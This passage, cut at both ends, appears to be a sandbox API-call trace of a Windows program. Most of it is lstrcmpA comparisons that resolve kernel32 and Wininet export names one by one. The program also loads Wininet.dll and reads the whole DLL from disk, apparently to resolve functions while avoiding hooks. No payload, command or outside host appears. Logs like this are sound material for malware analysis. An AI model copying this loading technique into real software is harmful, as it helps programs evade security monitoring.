lpString2="AddRefActCtx") returned 1 [0194.983] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0194.983] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0194.984] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0194.984] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0194.984] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0194.984] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0194.984] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0194.984] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0194.984] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0194.984] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0194.984] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0194.984] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0194.984] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0194.984] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0194.984] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0194.984] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0194.984] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0194.984] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0194.984] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0194.984] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0194.984] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0194.984] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0194.984] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0194.985] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0194.985] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0194.985] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0194.985] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0194.985] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0194.985] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0194.985] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0194.985] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0194.985] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0194.985] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0194.985] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0194.985] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0194.985] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0194.985] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0194.985] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0194.985] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0194.985] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0194.985] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0194.985] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0194.985] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0194.985] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0194.985] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0194.985] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0194.985] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0194.985] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0194.986] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0194.986] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0194.986] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0194.986] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0194.986] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0194.986] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0194.986] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0194.986] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0194.986] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0194.986] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0194.986] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0194.986] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0194.986] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0194.986] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0194.986] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0194.986] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0194.986] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0194.987] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0194.987] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0194.987] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0194.987] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0194.987] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0194.987] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0194.987] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0194.987] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0194.987] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0194.987] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0194.987] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0194.987] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0194.987] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0194.987] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0194.987] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0194.987] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0194.987] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0194.987] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0194.987] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0194.989] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0194.989] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0194.989] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0194.990] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0194.990] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0194.990] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0194.990] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0194.990] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0194.990] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0194.990] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0194.990] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0194.990] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0194.990] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0194.990] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0194.990] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0194.990] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0194.990] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0194.990] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0194.990] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0194.990] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0194.990] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0194.990] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0194.990] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0194.990] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0194.990] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0194.990] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0194.991] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0194.991] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0194.991] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0194.991] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0194.991] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0194.991] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0194.991] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0194.991] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0194.991] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0194.991] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0194.991] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0194.991] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0194.991] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0194.991] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0194.991] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0194.991] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0194.991] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0194.992] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0194.992] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0194.992] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0194.992] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0194.992] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0194.992] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0194.992] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0194.992] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0194.992] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0194.992] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0194.992] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0194.992] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0194.992] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0194.992] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0194.992] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0194.992] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0199.332] GetProcessHeap () returned 0x570000 [0199.333] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c5f0 | out: hHeap=0x570000) returned 1 [0199.335] GetProcessHeap () returned 0x570000 [0199.335] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x589020 [0199.336] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0199.354] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0199.354] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0199.354] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0199.355] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0199.355] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0199.355] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0199.355] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0199.355] GetProcessHeap () returned 0x570000 [0199.355] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x286600) returned 0x410e040 [0199.362] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0199.362] ReadFile (in: hFile=0x140, lpBuffer=0x410e040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x410e040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0200.210] CloseHandle (hObject=0x140) returned 1 [0200.210] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0200.210] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0200.210] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0200.210] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0200.211] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0200.211] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0200.211] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0200.211] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0200.211] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0200.211] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0200.211] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0200.211] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0200.211] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0200.211] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0200.211] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0200.211] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0200.212] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0200.212] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0200.212] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0200.212] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0200.212] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0200.212] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0200.212] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0200.212] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0200.212] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0200.212] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0200.212] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0200.212] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0200.212] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0200.212] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0200.212] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0200.212] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0200.212] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0200.212] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0200.212] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0200.212] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0200.212] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0200.213] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0200.213] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0200.213] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0200.213] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0200.213] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0200.213] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0200.213] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0200.213] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0200.213] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0200.213] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0200.213] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0200.213] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0200.213] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0200.213] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0200.213] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0200.213] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0200.213] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0200.213] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0200.213] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0200.213] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0200.214] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0200.214] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0200.214] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0200.214] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0200.214] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0200.214] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0200.214] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0200.214] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0200.214] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0200.214] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0200.214] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0200.214] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0200.214] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0200.214] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0200.214] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0200.214] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0200.214] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0200.214] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0200.214] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0200.214] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0200.214] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0200.214] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0200.215] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0200.215] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0200.215] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0200.215] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0200.215] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0200.215] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0200.215] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0200.215] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0200.215] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0200.215] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0200.215] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0200.215] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0200.215] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0200.215] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0200.215] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0200.215] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0200.215] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0200.215] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0200.216] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0200.216] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0200.216] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0200.216] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0200.216] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0200.216] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0200.216] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0200.216] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0200.216] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0200.216] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0200.216] lstrcmpA (lpString1="AppCacheGetIEGroupList", 